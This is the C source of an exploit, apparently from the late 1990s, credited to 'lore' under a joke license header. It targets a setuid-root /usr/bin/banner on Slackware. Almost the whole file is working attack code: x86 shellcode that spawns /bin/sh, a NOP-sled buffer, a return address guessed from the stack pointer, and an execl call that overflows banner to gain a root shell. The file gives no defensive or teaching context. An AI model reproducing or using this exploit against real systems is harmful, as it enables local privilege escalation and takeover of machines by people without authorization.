/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
/*
* banner.c exploit
* lore
*
* banner exploit which works with all versions of slackware
*
* Note: banner has to be setuid root (30% of systems i ran accross had
* banner installed suid root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char hellcode[] =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh.........";
/*
* From banner.c
*/
#define MAXSEG (1024)
#define BSIZE (MAXSEG)
#define ESIZE ((BSIZE+8))
#define PATH ("/usr/bin/banner")
#define OFFSET (400)
#define NOP (0x90)
int main __P((int, char **));
long get_esp __P((void));
long
get_esp(void)
{
__asm__("movl %esp, %eax");
}
int
main(int argc, char **argv)
{
int offset,
i,
j;
long addr;
char *evilbanner;
evilbanner = (char *) malloc(ESIZE);
offset = OFFSET;
for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
evilbanner[i] = NOP;
for (j = 0; i < (ESIZE - 4); ++j, ++i)
evilbanner[i] = hellcode[j];
if (argc > 1)
offset = atoi(argv[1]);
addr = (get_esp() - offset);
*(long *) (evilbanner + i) = addr;
fprintf(stderr, "banner exploit, lore\n");
fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);
execl(PATH, "banner", evilbanner, NULL);
}
syntax highlighted by Code2HTML, v. 0.9.1